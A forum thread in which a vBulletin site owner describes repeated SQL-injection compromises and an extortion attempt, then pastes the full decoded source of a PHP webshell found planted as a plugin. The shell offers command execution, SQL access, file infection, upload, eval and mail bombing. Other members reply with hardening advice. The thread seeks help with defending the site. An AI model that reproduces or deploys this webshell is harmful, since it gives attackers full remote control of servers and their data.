Urgent Help Needed : Site HAcked How?

[lcp03o]

Hi

My site www.computerforums.org was hacked a few weeks back by using the search function to search a group which then enabled them to run SQL injection and get my password ( http://www.youtube.com/watch?v=ztCFJvzv3NM )

There was a patch available to stop this threat so I restored the site from a backup and installed this patch (Which did fix the issue as I tested it). But yesterday they hacked me again. So I restored the database from a week back, then I deleted all files and only uploaded the latest version of VB files and performed an upgrade to the latest version of VB. (So i have a fresh upgraded install of VB)

But again today ive been hacked. I believe they have uploaded a shell program but I can not find it. I keek changing my passwords every few hours (Username + Hosting + SQL) but they keep getting back in. Any ideas what I can do??

The hacker has been sending me messages, this is what he has told me, I dont know if the below is true but this is what he is saying

-He is using an SQL injection hack to get it
-The vubrability is in the vbulletin files, all versions (But I uploaded fresh VB files and upgraded) could it be in the database somewhere?
-he wants money to stop the attacks

--------------- Added [DATE]1322388545[/DATE] at [TIME]1322388545[/TIME] ---------------

i have just found out that I have been hacked using this http://itsecbiz.blogspot.com/2011/07...f-you-got.html and I have decoded the file and it reads this

Quote:

@set_time_limit(0);$modearr=array("cmd","sql","inf ect","upload","ws_ver","ws_remove","ws_read","ws_s ave","ws_mail","ws_eval","ws_list","ws_homedir","w s_delete","ws_makedir","ws_rmdir","ws_down");$mode =$_REQUEST['mode'];if(in_array($mode,$modearr)){ function ws_stripslashes($string){if(get_magic_quotes_gpc() ){return StripSlashes($string);}else{return $string;}}if($mode=="cmd"){$cmd=$_REQUEST['cmd'];if(function_exists('system')){system($cmd);}elsei f(function_exists('exec')){exec($cmd,$output);fore ach($output as $line){echo$line."\n";}}elseif(function_exists('sh ell_exec')){$output=shell_exec($cmd);echo$output;} elseif(function_exists('popen')){$handle=popen($cm d,"r");$read=fread($handle,2096);echo$read;pclose( $handle);}}if($mode=="sql"){$host=$_REQUEST['host'];$port=$_REQUEST['port'];$username=$_REQUEST['username'];$password=$_REQUEST['password'];$dbname=$_REQUEST['dbname'];$query=$_REQUEST['query'];$link=mysql_connect($host.":".$port,$username,$pa ssword) or die('Could not connect: '.mysql_error());if($_REQUEST['sqlCmd']=="getDbs"){$db_list=mysql_list_dbs($link);while($ row=mysql_fetch_object($db_list)){echo"Database: ".$row->Database."\n";}mysql_free_result($db_list);}if($_ REQUEST['sqlCmd']=="getTables"){$result=mysql_list_tables($dbname); $num_rows=mysql_num_rows($result);for($i=0;$i<$num _rows;$i++){echo"Table: ".mysql_tablename($result,$i)."\n";}mysql_free_res ult($result);}if(isset($query)){mysql_select_db($d bname,$link) or die('Could not select database');$result=mysql_query(ws_stripslashes($qu ery)) or die("nInvalid query: ".mysql_error());while($row=mysql_fetch_assoc($res ult)){echo"Row {\n";foreach($row as $variable=>$value){echo$variable."=".$value."\n";} echo"\n}\n";}}mysql_close($link);}if($mode=="infec t"){$handle=fopen($_REQUEST["sourceFile"],"r+") or die("Error reading source file");$contents="";while(!feof($handle)){$content s.=fread($handle,8192);}fclose($handle);$handle=fo pen($_REQUEST['infectFile'],"r") or die("Error reading infect file");$contents2=$contents."\n";while(!feof($hand le)){$contents2.=fread($handle,8192);}fclose($hand le);$fp=fopen($_REQUEST['infectFile'],'w') or die("Error writing infect file");$write=fwrite($fp,$contents2);fclose($fp);i f($write){echo$_REQUEST['infectFile']." Infected";}}if($mode == "upload"){if($_FILES){if (is_uploaded_file($_FILES['file']['tmp_name'])){$uploadfile = basename($_FILES['file']['name']);if (move_uploaded_file($_FILES['file']['tmp_name'], $_REQUEST['dir'].$uploadfile)){echo $uploadfile." has been uploaded!.";}else{echo "Upload Failed!!!";}}}}if($mode=="ws_ver"){echo"WebShell PHP Server v3.2";}if($mode=="ws_remove"){$handle=fopen($_REQU EST["file"],"r+") or die("Error reading file");$contents="";while(!feof($handle)){$content s.=fread($handle,8192);}fclose($handle);$contents2 =preg_replace('/[<?\s]*eval.*\?>/si','',$contents);if($contents2){$fp=fopen($_REQUE ST['file'],'w') or die("Error writing file");$write=fwrite($fp,$contents2);fclose($fp);i f($write){echo"WebShell removed from ".$_REQUEST['file'];}}else{echo"Didnt Find Shell";}}if($mode=="ws_read"){$handle=fopen($_REQU EST['file'],"r") or die("Error with reading file");$contents="";while(!feof($handle)){$content s.=fread($handle,8192);}fclose($handle);echo$conte nts;}if($mode=="ws_save"){$contents=ws_stripslashe s($_REQUEST["contents"]);$fp=fopen($_REQUEST['file'],'w') or die("Error writing ".$_REQUEST['file']." file");$write=fwrite($fp,$contents);fclose($fp);if ($write){echo$_REQUEST['file']." saved";}}if($mode=="ws_mail"){$mailtimes="1";$head ers='From: '.ws_stripslashes($_REQUEST['from']).'';while($mailtimes<=$_REQUEST['times']){mail(ws_stripslashes($_REQUEST['to']),ws_stripslashes($_REQUEST['subject']),ws_stripslashes($_REQUEST['msg']),$headers);$mailtimes++;}echo"Mail Bomb Complete";}if($mode=="ws_eval"){$php=$_REQUEST['php'];eval(base64_decode(ws_stripslashes($php)));}if($m ode=="ws_list"){$dir=$_REQUEST['dir'];$hook=opendir($dir) or die('cant open dir');while(false!==($file=readdir($hook))){$fpath =$dir.$file;if(is_dir($fpath)){if($file!='.'&&$fil e!='..'){echo"Directory: ".$file."\n";}}if($file!='.'&&$file!='..'&&!is_dir ($fpath)){echo"File: ".$file."\n";}}}if($mode=="ws_homedir"){echo$_SERV ER["DOCUMENT_ROOT"];}if($mode=="ws_delete"){unlink($_REQUEST['file']) or die('Cant delete file');echo"File Deleted";}if($mode=="ws_makedir"){mkdir($_REQUEST['dir'],$_REQUEST['chmod']) or die('Cant create dir');echo"Directory Created";}if($mode=="ws_rmdir"){rmdir($_REQUEST['dir']) or die('Cant remove dir');echo"Directory Removed";}if($mode=="ws_down"){header('Content-type: application/octet-stream');header('Content-Disposition: attachment; filename='.$_REQUEST['file'].'');readfile($_REQUEST['file']);}die();}

I have disabled the plugin, is this enough??

[setishock]

According to the blog the attacker has to have admin access to start with. The hack is installed either as a skin xml or as a mod plug in. Is it just you and David as admins?
Something, either the hosting or a mod, has punched a hole in your security. The fact they were already in the acp to install the plugin is disturbing.

[preemz10314]

Disabling the plugin may work. A Shell is a trojan, a back door into your system. If your site is just being hosted thru a register then that could work just by deleting it. However, if you are hosting your forum on a VPS or your own dedicated server then he could have uploaded a shell somewhere else which could give him easy access into your domain. Contact your hosting and tell them to disable shell's from running. I am and change all of your passwords.

Also, edit your .htacess to only allow YOUR IP to hit the admincp and your moderaters (if they & you use use dynamic ips). There are tutorials on how to secure your forum around. And also, rename your admin and modcp folder to something else, and also edit them in the config.php to match. This is another form of security for your forum so by default, its yourforum/admincp it is a good idea to change that to something else. Sure a hacker could also crawl your site to try to find it, but naming it something incognito like say youforum.com/lmages (with a lower case L ) may throw them off.

Most of these SQL hackers do not know very much and just follow others tutorials. Without a deeper understanding of vbulletin itself they may be thrown off guard and move on.

[setishock]

Woah! Last night I checked the site as I am a long time member there. Got the database errors screen. This morning just a blank page.
Good advice preemz. Hope he gets it back up pretty quick.